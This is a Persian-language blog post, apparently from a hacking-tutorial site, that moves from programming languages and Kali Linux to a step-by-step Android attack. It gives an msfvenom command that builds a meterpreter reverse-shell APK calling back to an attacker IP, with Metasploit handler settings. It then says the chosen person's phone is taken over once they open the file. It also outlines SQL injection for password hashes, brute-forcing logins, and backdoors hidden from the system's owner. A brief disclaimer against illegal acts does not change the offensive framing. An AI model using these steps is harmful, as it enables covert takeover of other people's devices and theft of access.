آموزش برنامه نویسی هک و امنیت شبکه و سیستم های مختلف

هک کردن اینستاگرام
هک کردن اینستاگرام چگونه انجام می شود؟ آیا برنامه ای برای این کار وجود دارد؟
آوریل 2, 2019
هک تلگرام با شماره تلفن
هک تلگرام با شماره تلفن چگونه ممکن است ؟
آوریل 6, 2019

آموزش برنامه نویسی هک و امنیت شبکه و سیستم های مختلف

آموزش برنامه نویسی هک

برای انجام عمل هک و اینکه بخواهیم به یک هکر تبدیل شویم و وارد دنیای هک و امنیت شویم، اولین دانشی که نیازمند یادگیری آن هستیم، دانش برنامه نویسی می باشد. علاوه بر برنامه نویسی مهارت های دیگری نیز باید آموخت، اما مهمترین و سخت ترین قسمت کار فراگیری و آموزش برنامه نویسی هک می باشد. اگر بدون یادگیری کامل زبان های برنامه نویسی و با تجربه کم وارد دنیای هک شوید، پیش از آنکه به هدف خود برسید افراد دیگر سیستم شما را هک خواهند کرد و در ابتدای کار با شکست مواجه خواهید شد. بنابراین برای موفقیت در این زمینه قبل از هر چیز باید شروع به آموزش برنامه نویسی هک و امنیت نمایید و بعد از آن مهارت های خود را در زمینه های دیگر بالا ببرید. حال ما در این مطلب قصد داریم ابتدا زبان های برنامه نویسی لازم برای هک و امنیت را به شما معرفی کرده و سپس مراحل دیگری که برای تبدیل شدن به یک هکر می بایست طی کنید را آموزش دهیم.

مرحله اول : آموزش برنامه نویسی هک

تمامی هکرهای حرفه ای مانند هکرهای کلاه سیاه، کلاه سفید و کلاه خاکستری و همه کارشناسان و متخصصان امنیت کامپیوتر، باید آموزش برنامه نویسی هک را ببینند و با زبان های برنامه نویسی آشنا باشند. هر چه دانش هکر در رابطه با این زبان ها بیشتر باشد، مطمئنا خروجی کار او بهتر خواهد بود و می تواند به آینده شغلی که برگزیده، امیدوارتر باشد.

در سویی دیگر دسته ای از هکر ها نیز هستند که با داشتن دانش بسیار پایین و با استفاده از ابزارها و نرم افزارهایی که هکرهای حرفه ای طراحی کرده اند، به هک گوشی یا کامپیوتر اطرافیان خود می پردازند. به این هکر ها هکر کلاه صورتی می گویند. موفق شدن هکرهای کلاه صورتی به برنامه ای که از آن استفاده می کنند و چگونگی اجرای دستورالعمل ها بستگی خواهد داشت. نمونه ای از این هکرها را می توان در تلاش های مختلف برای هک وای فای با اندرودامپر، هک اینستاگرام با ترموکس و یا هک تلگرام مشاهده کرد که گاهی نیز موفقیت هایی را در این زمینه کسب می کنند، اما هیچ دانشی در زمینه برنامه نویسی نداشته و صرفا به استفاده از نرم افزارهای مختلف ساخته شده در این زمینه می پردازند.

اما همانطور که گفتیم برای تبدیل شدن به یک هکر حرفه ای و ایجاد آینده شغلی مناسب (که البته منظور ما از شغل در اینجا متخصص هک و امنیت است که در کشورهای صنعتی و پیشرفته از جایگاه بسیار خوب و ویژه ای برخوردار بوده و یکی از بالاترین دستمزدهای سالانه را دریافت می کند) می بایست در ابتدا آموزش برنامه نویسی هک را ببینید و با زبان های برنامه نویسی آشنا شوید، که در ادامه به معرفی و توضیح مختصری از این زبان ها خواهیم پرداخت.

زبان برنامه نویسی C و ++C

زبان C و ++C یکی از مهمترین زبان های برنامه نویسی می باشند که به عنوان اولین زبان نیز در آموزش برنامه نویسی هک شناخته می شود. همه متخصصان هک و امنیت می بایست به این دو زبان مسلط باشند چرا که زبان های مدرن دیگر مانند پایتون، جاوا، پی اچ پی و … با زبان C نوشته شده اند. همچنین زبان C پایه نوشتم سیستم عامل هایی همچون ماکروسافت و لینوکس است.

برنامه نویسی شی گرا نیز برپایه زبان ++C نوشته شده است و تمامی زبان هایی که پس از آن از روش شی گرایی استفاده کرده اند، خودشان با استفاده از زبان ++C نوشته شده اند.

زبان Python

یکی از محبوب ترین زبان های برنامه نویسی برای هک میان متخصصان این زمینه، زبان پایتون می باشد. دلیل این محبوبیت وجود کتابخانه های متنوع جهت ساخت برنامه های هک می باشد که کار را برای هکرها و متخصصان امنیت بسیار راحت تر می کند.

زبان پایتون نزدیک به زبان انسان است و یک زبان برنامه نویسی سطح بالا به حساب می آید. اسکریپت هایی که به وسیله پایتون نوشته می شوند، توانایی اجرا بدون نیاز به کامپایل شدن را نیز دارند. پایتون یک زبان برنامه نویسی متن باز می باشد و همچنین مبتنی بر شی گرایی نیز هست.

زبان  Java

یکی دیگر از زبان هایی که در آموزش برنامه نویسی هک گفته می شود ، زبان جاوا می باشد. این زبان دارای خاصیت جادویی اجرا روی پلتفرم می باشد که آن را از دیگر زبان ها متمایز ساخته است. زبان جاوا با شعار “یک بار بنویس و همه جا اجرا کن!“ ساخته شده و همه جا نیز با همین شعار شناخته می شود. این شعار به معنی این است که اغلب پلتفروم های معروفف می توانند کد های جاوا را اجرا کنند. جاوا یکی از بهترین زبان ها برای ساخت اپلیکیشن های اندرویدی نیز می باشد.

زبان PHP

برای متخصصان و کارشناسان هک و امنیت php یک زبان شناخته شده می باشد. این زبان برای متخصصان وب نویسی نیز بسیار کاربردی می باشد. یادگیری این زبان برای اینکه بدانید درخواست های POST و GET چگونه عمل می کنند بسیار کاربردی می باشد. در واقع کاربرد اصلی PHP برای هک و ورود به وبسایت ها می باشد.

زبان HTML و JavaScript

در بین زبان هایی که برای آموزش برنامه نویسی هک گفته می شود، نمی توان از جاوا اسکریپت صحبت کرد اما به HTML اشاره نکرد. هسته اولیه وب نویسی همین دو زبان برنامه نویسی می باشند. هر فردی که بخواهد در زمینه طراحی صفحات وب فعالیت داشته باشد و مهارت کسب کند ابتدا باید زبان پایه HTML را به طور کامل بشناسد. بعد از یادگیری HTML، یادگیری JavaScript نیز آغاز می شود که یک زبان سمت کلاینت است.

زبان پرس و جوی SQL

با یادگیری زبان برنامه نویسی SQL می توانید بفهمید که اطلاعات و داده ها در پایگاه داده چگونه ذخیره مشوند. با یادگیری این زبان آموزش برنامه نویسی هک کامل می شود. همانطور که می دانید در دنیای امروز اطلاعات مهمترین دارایی هر فرد یا سازمانی محسوب می شود که این اطلاعات نیز نیازمند مراقبت می باشند. کلیه سایت ها و سرویس های تحت وب، اطلاعات و داده های خود را در دیتابیس مخصوص به خود ذخیره می کنند. این دیتابیس ها اغلب با زبان SQL  کار می کنند. با یادگیری این زبان می توانید از ساز و کار خواندن و نوشتن اطلاعات آگاهی کسب کنید و مفهوم جداول و ارتباط آن ها را با یکدیگر درک کنید.

مرحله دوم: لینوکس را بشناسید و آن را فرا بگیرید

در مطالب پیشین چندین بار درباره سیستم عامل لینوکس و کالی لینوکس صحبت کرده ایم. همانطور که می دانید کالی لینوکس یکی از نسخه های قدرتمند سیستم عامل لینوکس است که به منظور هک و تست نفوذ طراحی و ارائه شده است. وقتی از کالی لینوکس استفاده می‌کنید می‌توانید به حجم وسیعی از ابزارهای قدرتمند برای انجام هک و نفوذ دسترسی داشته باشید.

هک با کالی لینوکس

کالی لینوکس به دلیل برخوردار بودن از خط فرمان قدرتمند می‌تواند بسیاری از کارها را به صورت خودکار برای شما انجام دهد.

در ادامه یکی از مواردی که می توانید به عنوان یک هکر از کالی لینوکس استفاده کنید و به دستگاه هوشمند شخص مورد نظر نفوذ کنید را آموزش خواهیم داد.

هک با کالی لینوکس

تا به اینجا به طور کامل با سیستم عامل کالی لینوکس آشنا شدید، حال وقت آن است که روش انجام هک با کالی لینوکس را نیز فرابگیرید. برای هک با کالی لینوکس مراحلی که در ادامه خواهیم گفت را به ترتیب انجام دهید تا موفق به هک با کالی لینوکس این سیستم قدرتمند شوید.

ابتدا نسخه کالی لینوکس را روی سیستم خود نصب نمایید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کنید. با استفاده از این ابزار، اقدام به ساخت یک برنامه هک اندروید به صورت APK نمایید. برای ساخت چنین ابزاری تنها نیاز دارید که دستور زیر را در محیط ترمینال لینوکس وارد نمایید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق به جای عبارت LHOST می توانید از آدرس آی پی خودتان و در قسمت LPORT از پورت اینترنت خودتان استفاده کنید. Name.apk نام ابزاری است که شما به عنوان هکر آن را می سازید تا با آن اقدام به هک نمایید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

  • Msf>use exploit/multi/handler
  • Msf>set PAYLOAD android/meterpreter/reverse_tcp
  • Msf>set LHOST 192.168.1.35
  • Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کنید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک نماید.

بازدید:

مرحله سوم: یاد گیری مفاهیم شبکه

بسیاری از متخصصین هک و امنیت آشنایی چندانی با شبکه ندارند، اما اگر شما می خواهید یکی از متخصصین حرفه ای باشید می بایست شبکه را به درستی و به صورت مفهومی فرا بگیرید. چرا که اگر با مفهوم شبکه آشنا نباشید از حجم وسیع آسیب پذیری‌های موجود در شبکه‌ها محروم می‌شوید.

فراگیری شبکه نیازمند یادگیری اصطلاحات و استانداردهای موجود و توانایی در پیاده سازی شبکه‌های مختلف می باشد.

برای یادگیری شبکه می‌توانید با دوره‌ها و کتاب‌های network+ آغاز کنید.

مرحله چهارم: انتخاب هدف و جمع آوری اطلاعات

در انتخاب هدف های خود دقت کنید و هیچ وقت عملی غیر قانونی انجام ندهید، چرا که هرقدر هم شما در این زمینه متخصص باشید باز هم مقامات امنیتی و متخصصان پلیس به دلیل سطح دانش بالایی که دارند می توانند شما را دستگیر کنند.

آموزش برنامه نویسی هک

برای تمرین عمل هک و یادگیری بهتر در این زمینه می توانید خود را هک کنید. به این صورت که یک سرور مجازی برای خود ایجاد کنید و سعی کنید به آن نفوذ نمایید.

همچنین می توانید از سایت‌های آسیب پذیر که برای تمرین در اختیار دانش پذیران امنیت قرار گرفته اند، استفاده کنید.

وقتی هدف خود را انتخاب نمودید، باید عملیات جمع آوری اطلاعات را شروع کنید، در این مرحله هر اطلاعاتی مفید است از جمله:

  • موقعیت مکانی و زمانی هدف
  • زبان رسمی مورد استفاده توسط متخصص پیاده کننده سرویس
  • سیستم عامل و سرویس‌هایی که روی سیستم عامل پیاده شده است
  • سعی در تشخیص فایروال و تمهیدات امنیتی سیستم
  • تکنولوژی‌های مورد استفاده
  • بررسی مشکلات امنیتی موجود در سیستم با استفاده از ابزارهای مختلف
  • بررسی مسائل مرتبط با شبکه از جمله تعداد IP و پورت‌های باز موجود در سیستم

مرحله پنجم: تلاش برای شکستن رمز ها

همانطور که می دانید برای ورود به اکثر سیستم ها و شبکه ها باید پسورد آن را در اختیار داشته باشیم. برای این منظور با نفوذ پذیری SQL Injection می‌توانید یک Hash از کلمه عبور را بیابید که با کمک تکنیک‌های کرک کردن عبارات هش شده می توانید به رمز عبور سیستم دست پیدا کنید.

علاوه بر این راهکارهای دیگری نظیر burtforce وجود دارند که با استفاده از آنها می‌توانید حجم وسیعی از کلمه‌های عبور را بر روی فرم ورود تست کرده و به کلمه عبور صحیح دسترسی پیدا کنید.

مرحله ششم: ساخت در پشتی و یا BackDoor برای حفظ دسترسی

در برخی موارد ممکن است با در اختیار داشتن رمز عبور سیستم موردنظر، بتوانید وارد آن شوید، اما اگر بعد از چند روز رمز عبور توسط صاحب سیستم عوض شود، دسترسی شما نیز قطع می شود و دیگر نمی توانید وارد سیستم شوید.

از همین رو بعد از هر نفوذی باید سعی کنید یک در پشتی و یا BackDoor در سیستم ایجاد کنید.

درهای پشتی بستگی به نوع سیستمی که به آن نفوذ کردید دارد و با توجه به نوع سیستم می‌توانند پیچیده و یا ساده باشند. اکیدا درهای پشتی باید به گونه‌ای اضافه شوند که صاحب سیستم نتواند به ماهیت و نفوذ شما پی ببرد.

بازدیدها: 1620

دیدگاهتان را بنویسید